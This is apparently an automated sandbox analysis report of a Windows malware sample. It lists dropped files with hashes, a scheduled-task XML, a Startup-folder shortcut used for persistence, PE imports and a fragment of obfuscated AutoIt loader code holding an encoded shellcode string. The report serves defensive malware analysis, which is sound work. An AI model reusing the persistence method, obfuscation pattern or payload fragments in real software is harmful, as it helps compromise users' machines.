        Preview: z.(+...!........;.N.......E............q..B....5.UTtw.Sf..aE.j.Ix.Tq....9..8w.PxA...*.-...xA&..'..mX........9.My..M-.2V0....,...M..q.....v...._..T67b5.Jb.S..Q!QQ..(ni....J..Y&..z..gj5...jH..G......s.7...0...u.AL......$....Y...S...i.....WJ.t.=......R..@...O2..sf.XQ......3.z....NQl.h....X .....:d.O.....1N...i6..EU..J8.....V.{.c.F..............A..C[....m...E..N..PZ.......{H..e~..I.......7..%..o .M+.B..~..../\Y=s..JX@.....*f..s&..3..1Y..._:...c/......Tc.../A..>n.F.../.Z.U.i......}...+..i4\....Z#.....&.JD.."O.?.ou(u4%b..O..Tm.y.n...{.........t.~w?.0.3.Bx..)....e.-.][. ...QeH.n.....vM........m...RE..../(N.....H.up}.....v..l..ey.o.((O..#s.I.LX...j..9)...X.h..$%Vk.........ta_.~.....2V..X.@o..R.....`[.T...,.O..Q.H......s.C...J.w.......q.....wr...N.'W.r.;."jo.Z....?....z.....b.w.D..b|...@......N;....^L....2..nx..-...~.+@....C.....A./6GJ.t..g.s.MA.R...rh.......1..*4.B..)...........V.HM..AB....zJ.`|`...g....iwOd..Q..B..F.s.7.WS.-.@...6...l...j.a]U..-"!".!.
        C:\Users\user\AppData\Local\Temp\cbmfpeiu
        Process:C:\Users\user\Desktop\qnJXJsqt1M.exe
        File Type:data
        Category:modified
        Size (bytes):207872
        Entropy (8bit):7.999050560075495
        Encrypted:true
        SSDEEP:6144:yfHioBK/DQ0vgnZ92J6yN8n59mrjuydK/znla5oC:yfOjvgb2JpNeorjOznA5oC
        MD5:D63A88D1A1B8198E665C1094E96488BC
        SHA1:427EA9EB92C1C20B647CECD78C6085B509BCC326
        SHA-256:68B951C18FA6D7FDD30A5EB01609BAB36677D1414A6EC2D5A25C327A7D7CB9B0
        SHA-512:9C79A3F8E506447F6B5D24E27CED80E4EE449245D3483741EBD27E89656423B0ABDE9AE8ADBEAB430566999E86E3E70A8FECB6FE7F515F327066FF42E7A9E236
        Malicious:false
        Reputation:low
        Preview: z.(+...!........;.N.......E............q..B....5.UTtw.Sf..aE.j.Ix.Tq....9..8w.PxA...*.-...xA&..'..mX........9.My..M-.2V0....,...M..q.....v...._..T67b5.Jb.S..Q!QQ..(ni....J..Y&..z..gj5...jH..G......s.7...0...u.AL......$....Y...S...i.....WJ.t.=......R..@...O2..sf.XQ......3.z....NQl.h....X .....:d.O.....1N...i6..EU..J8.....V.{.c.F..............A..C[....m...E..N..PZ.......{H..e~..I.......7..%..o .M+.B..~..../\Y=s..JX@.....*f..s&..3..1Y..._:...c/......Tc.../A..>n.F.../.Z.U.i......}...+..i4\....Z#.....&.JD.."O.?.ou(u4%b..O..Tm.y.n...{.........t.~w?.0.3.Bx..)....e.-.][. ...QeH.n.....vM........m...RE..../(N.....H.up}.....v..l..ey.o.((O..#s.I.LX...j..9)...X.h..$%Vk.........ta_.~.....2V..X.@o..R.....`[.T...,.O..Q.H......s.C...J.w.......q.....wr...N.'W.r.;."jo.Z....?....z.....b.w.D..b|...@......N;....^L....2..nx..-...~.+@....C.....A./6GJ.t..g.s.MA.R...rh.......1..*4.B..)...........V.HM..AB....zJ.`|`...g....iwOd..Q..B..F.s.7.WS.-.@...6...l...j.a]U..-"!".!.
        C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):1320
        Entropy (8bit):5.136963558289723
        Encrypted:false
        SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnc2xtn:cbk4oL600QydbQxIYODOLedq3ZLj
        MD5:AE766004C0D8792953BAFFFE8F6A2E3B
        SHA1:14B12F27543A401E2FE0AF8052E116CAB0032426
        SHA-256:1ABDD9B6A6B84E4BA1AF1282DC84CE276C59BA253F4C4AF05FEA498A4FD99540
        SHA-512:E530DA4A5D4336FC37838D0E93B5EB3804B9C489C71F6954A47FC81A4C655BB72EC493E109CF96E6E3617D7623AC80697AD3BBD5FFC6281BAFC8B34DCA5E6567
        Malicious:true
        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:Non-ISO extended-ASCII text, with no line terminators
        Category:dropped
        Size (bytes):8
        Entropy (8bit):3.0
        Encrypted:false
        SSDEEP:3:2kn:2kn
        MD5:2CCE6DD7EC46400F96706148A26C15E9
        SHA1:776024E284F2F59F8E908E2D5E6CDFBC64BD0533
        SHA-256:513BD4A52AF323A89B4DC79B6CF52BA9FF9EABCB8809164B1E6245311A97FC03
        SHA-512:A6D98B433EB75EEDC79B4360E309127F34DB49D3E596B9C0520D2E10BDDF26C170F96AF87B2C26451A82B7DB7AAD568894E9DBC0E1BDEE45B17A4F95CCE04DC3
        Malicious:true
        Preview: `.?...H
        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):57
        Entropy (8bit):4.85263908467479
        Encrypted:false
        SSDEEP:3:oMty8WbSI1u:oMLWuI1u
        MD5:A35128E4E28B27328F70E4E8FF482443
        SHA1:B89066B2F8DB34299AABFD7ABEE402D5444DD079
        SHA-256:88AEA00733DC4B570A29D56A423CC5BF163E5ACE7AF349972EB0BBA8D9AD06E1
        SHA-512:F098E844B5373B34642B49B6E0F2E15CFDAA1A8B6CABC2196CEC0F3765289E5B1FD4AB588DD65F97C8E51FA9A81077621E9A06946859F296904C646906A70F33
        Malicious:false
        Preview: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url
        Process:C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe
        File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe>), ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):97
        Entropy (8bit):4.93582930767928
        Encrypted:false
        SSDEEP:3:HRAbABGQYm5uO0nacwREaKC5D9c6AQA:HRYFVmwOcNwiaZ5D+1V
        MD5:4123D4FB8377EF3CC0C17FE846A33369
        SHA1:FFD3BFA064E3245D1D49D0CBCFBC2DA102A69021
        SHA-256:486EDCABE152F5B618A2867452A35A42A87D5A831E520F4110CFF057B7356814
        SHA-512:C8F77644F8B08EB11590C6E6F02175E9501BD2FC772382D52342AD8331ED5D66783EB7D409E07B031485F8299956E906E2BE0DA160C0B0EEF63141AFC195CFD6
        Malicious:true
        Yara Hits:
        • Rule: Methodology_Suspicious_Shortcut_Local_URL, Description: Detects local script usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url, Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
        Preview: [InternetShortcut]..URL=file:///C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe
        C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe
        Process:C:\Users\user\Desktop\qnJXJsqt1M.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):1253382
        Entropy (8bit):7.157529868192481
        Encrypted:false
        SSDEEP:24576:Ptb20pkaCqT5TBWgNn97agoIpzBTbOGabuHqQE1drbmz6AK:MVg5t97aIFsGabuKxez5K
        MD5:206B9BA9B804BD72DB71AEBAB5967567
        SHA1:D78387B9A72560CE7E3E0D7B5C35123E17382202
        SHA-256:32B7D46EC03F2580FED078C680CEEAD30BA9B2541C7E9EE1BB5EAE35F2DBD6D0
        SHA-512:F42B8C7A2483DBCE95BD15F9668D5CD8372302EF2EBBFD65392A2B7B6F2D65C15C3BF5598F29349A38D58C8E2F994F4551D2E82F63921D41929BD0924F5322C6
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: Virustotal, Detection: 55%, Browse
        • Antivirus: ReversingLabs, Detection: 48%
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L....2.[.........."..........&......t_............@..........................@......[.....@...@.......@......................p..|....@...O......................Ll..................................0'..@...............`............................text...O............D.............. ..`.rdata..B............:..............@..@.data...T........b...H..............@....rsrc....O...@...P..................@..@.reloc..t............z..............@..B................................................................................................................................................................................................................................................................................................
        \Device\ConDrv
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):235
        Entropy (8bit):5.107306146099542
        Encrypted:false
        SSDEEP:6:zx3M1tlAX8bSWR30qysGMQbSVRRZBXVRbJ0fFPRAgRYan:zK1XnV30ZsGMIG9BFRbQ5AUYan
        MD5:67DDD8252A246E7B14649B0063E351C0
        SHA1:AAE1C6839D1CC4A626D0FB2D4773823AD209FA17
        SHA-256:24C8283BA3F7FCA2E4CEF6F141263DD1E8A36E5A5CD96A97BFE83525D7663116
        SHA-512:326A5E0A440F60D4808C91499F1F3616C496B67DC053B4A2A40B0FE09002074AE5365018781F8746E98E7E3CFCD35F1310D17FB7C2138A8157318E6791987025
        Malicious:false
        Preview: Microsoft (R) Build Engine Version 2.0.50727.8922..[Microsoft .NET Framework, Version 2.0.50727.8922]..Copyright (C) Microsoft Corporation 2005. All rights reserved.....MSBUILD : error MSB1009: Project file does not exist...Switch: 0..

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.157525970840198
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:qnJXJsqt1M.exe
        File size:1253376
        MD5:e98ce8a425d942e7337ecbd309707e25
        SHA1:39e794cff61991cbcc073db38bfbf1e496953106
        SHA256:34d2073606f34324e1ba7146defa9f69e387059b64d1bfb28a5c9f37b0fc9436
        SHA512:a63c9c18d7c06d498b6214ba0899cd17a078f28fc3ce813175334eda332d075abc74ce93b78ad3c4e55e8e7f0cb352ece64ae8a3265cda38b0358e0a1ee32e17
        SSDEEP:24576:Ptb20pkaCqT5TBWgNn97agoIpzBTbOGabuHqQE1drbmz6A:MVg5t97aIFsGabuKxez5
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

        File Icon

        Icon Hash:e0b8cef0f0e264e4

        Static PE Info

        General

        Entrypoint:0x425f74
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
        Time Stamp:0x5BAE3218 [Fri Sep 28 13:52:24 2018 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:1
        File Version Major:5
        File Version Minor:1
        Subsystem Version Major:5
        Subsystem Version Minor:1
        Import Hash:3d95adbf13bbe79dc24dccb401c12091

        Entrypoint Preview

        Instruction
        call 00007FA134CAE81Fh
        jmp 00007FA134CA1834h
        int3
        int3
        push edi
        push esi
        mov esi, dword ptr [esp+10h]
        mov ecx, dword ptr [esp+14h]
        mov edi, dword ptr [esp+0Ch]
        mov eax, ecx
        mov edx, ecx
        add eax, esi
        cmp edi, esi
        jbe 00007FA134CA19BAh
        cmp edi, eax
        jc 00007FA134CA1D1Eh
        bt dword ptr [004C0158h], 01h
        jnc 00007FA134CA19B9h
        rep movsb
        jmp 00007FA134CA1CCCh
        cmp ecx, 00000080h
        jc 00007FA134CA1B84h
        mov eax, edi
        xor eax, esi
        test eax, 0000000Fh
        jne 00007FA134CA19C0h
        bt dword ptr [004BA370h], 01h
        jc 00007FA134CA1E90h
        bt dword ptr [004C0158h], 00000000h
        jnc 00007FA134CA1B5Dh
        test edi, 00000003h
        jne 00007FA134CA1B6Eh
        test esi, 00000003h
        jne 00007FA134CA1B4Dh
        bt edi, 02h
        jnc 00007FA134CA19BFh
        mov eax, dword ptr [esi]
        sub ecx, 04h
        lea esi, dword ptr [esi+04h]
        mov dword ptr [edi], eax
        lea edi, dword ptr [edi+04h]
        bt edi, 03h
        jnc 00007FA134CA19C3h
        movq xmm1, qword ptr [esi]
        sub ecx, 08h
        lea esi, dword ptr [esi+08h]
        movq qword ptr [edi], xmm1
        lea edi, dword ptr [edi+08h]
        test esi, 00000007h
        je 00007FA134CA1A15h
        bt esi, 03h
        jnc 00007FA134CA1A68h
        movdqa xmm1, dqword ptr [esi+00h]

        Rich Headers

        Programming Language:
        • [RES] VS2012 UPD4 build 61030
        • [ASM] VS2012 UPD4 build 61030
        • [ C ] VS2008 SP1 build 30729
        • [IMP] VS2008 SP1 build 30729
        • [LNK] VS2012 UPD4 build 61030

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x54f80.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1190000x6c4c.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x8b54f0x8b600False0.569949901906data6.68041374921IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        .rdata0x8d0000x2cc420x2ce00False0.330464397632data5.77019233319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0xba0000x9d540x6200False0.164022640306data2.00269109997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
        .rsrc0xc40000x54f800x55000False0.923647173713data7.80704970662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0x1190000xa4740xa600False0.501788403614data5.24542665412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

        Resources

        NameRVASizeTypeLanguageCountry
        RT_ICON0xc45900x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
        RT_ICON0xc46b80x668dataEnglishGreat Britain
        RT_ICON0xc4d200x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2273871991, next used block 16289656EnglishGreat Britain
        RT_ICON0xc50080x1e8dataEnglishGreat Britain
        RT_ICON0xc51f00x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
        RT_ICON0xc53180xea8dataEnglishGreat Britain
        RT_ICON0xc61c00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishGreat Britain
        RT_ICON0xc6a680x6c8dataEnglishGreat Britain
        RT_ICON0xc71300x568GLS_BINARY_LSB_FIRSTEnglishGreat Britain
        RT_ICON0xc76980xabb6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain
        RT_ICON0xd22500x25a8dataEnglishGreat Britain
        RT_ICON0xd47f80x10a8dataEnglishGreat Britain
        RT_ICON0xd58a00x988dataEnglishGreat Britain
        RT_ICON0xd62280x468GLS_BINARY_LSB_FIRSTEnglishGreat Britain
        RT_STRING0xd66900x594dataEnglishGreat Britain
        RT_STRING0xd6c240x68adataEnglishGreat Britain
        RT_STRING0xd72b00x490dataEnglishGreat Britain
        RT_STRING0xd77400x5fcdataEnglishGreat Britain
        RT_STRING0xd7d3c0x65cdataEnglishGreat Britain
        RT_STRING0xd83980x466dataEnglishGreat Britain
        RT_STRING0xd88000x158dataEnglishGreat Britain
        RT_RCDATA0xd89580x400cbdata
        RT_GROUP_ICON0x118a240xbcdataEnglishGreat Britain
        RT_GROUP_ICON0x118ae00x14dataEnglishGreat Britain
        RT_VERSION0x118af40xdcdataEnglishGreat Britain
        RT_MANIFEST0x118bd00x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain

        Imports

        DLLImport
        WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
        COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
        PSAPI.DLLGetProcessMemoryInfo
        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
        USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
        UxTheme.dllIsThemeActive
        KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
        USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
        GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
        ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
        OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

        Version Infos

        DescriptionData
        Translation0x0809 0x04b0

        Possible Origin

        Language of compilation systemCountry where language is spokenMap
        EnglishGreat Britain

        Static AutoIT Info

        General

        Code:$912996352 = 1178081240 WHILE 1 SWITCH $912996352 CASE 3492363 GLOBAL $S31333431KNVA = $I31330D6 ("dwordcv2qec56nxvkas7dt" , 17 + 7879 * 5 + 4294927901 ) $912996352 = 1998142335 CASE 18804574 GLOBAL $N32363039121 = 3 $912996352 = 1856701497 CASE 28750967 GLOBAL $J3333397DO7 = $V39NUX ("5bzshg2bzshg8BFbzshg0bzshgE8bzshg05FbzshgEbzshgFbzshgFbzshgFF890bzshg3bzshg85bzshgC0bzshg7bzshg4bzshgBbzshg08Bbzshg4bzshgDbzshg0bzshgCbzshg49bzshg0bzshgFbzshgB7Cbzshg9bzshgBbzshgAFFbzshgFbzshgF0bzshg00bzshg0bzshgBbzshg8bzshg595bzshg00bzshg0bzshg0bzshg0bzshgCbzshg74bzshg3045bzshg85bzshg9bzshg5bzshg9bzshg5bzshg9" , "bzshg" , "" ) $912996352 = 77291538 CASE 31564936 GLOBAL $S3131302YFY55 = $C31KU765 (R37FLO7 (87344 ) ) & $C31KU765 (R37FLO7 (87364 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87389 ) ) & $C31KU765 (R37FLO7 (87392 ) ) & $C31KU765 (R37FLO7 